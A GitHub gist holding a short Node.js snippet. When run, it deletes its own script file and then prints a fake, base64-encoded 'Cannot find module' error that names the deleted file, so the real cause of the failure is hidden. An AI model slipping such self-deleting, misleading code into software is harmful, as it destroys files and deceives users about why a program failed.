Created
January 31, 2017 00:24
-
-
Save zekesonxx/f0f4c40c19b211f240ec623b2f1fcc21 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if (typeof require == 'function' && typeof process == 'object' && typeof require('fs') == 'object') { | |
try {require('fs').unlinkSync(process.argv[1]);} catch (e) {} | |
console.error(new Buffer("bW9kdWxlLmpzOjQ3MgogICAgdGhyb3cgZXJyOwogICAgXgoKRXJyb3I6IENhbm5vdCBmaW5kIG1vZHVsZSAncGF0aG8nCiAgICBhdCBGdW5jdGlvbi5Nb2R1bGUuX3Jlc29sdmVGaWxlbmFtZSAobW9kdWxlLmpzOjQ3MDoxNSkKICAgIGF0IEZ1bmN0aW9uLk1vZHVsZS5fbG9hZCAobW9kdWxlLmpzOjQxODoyNSkKICAgIGF0IE1vZHVsZS5ydW5NYWluIChtb2R1bGUuanM6NjA1OjEwKQogICAgYXQgcnVuIChib290c3RyYXBfbm9kZS5qczo0MjA6NykKICAgIGF0IHN0YXJ0dXAgKGJvb3RzdHJhcF9ub2RlLmpzOjEzOTo5KQogICAgYXQgYm9vdHN0cmFwX25vZGUuanM6NTM1OjM=", 'base64').toString("utf8").replace('patho', process.argv[1])); | |
process.exit(1); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment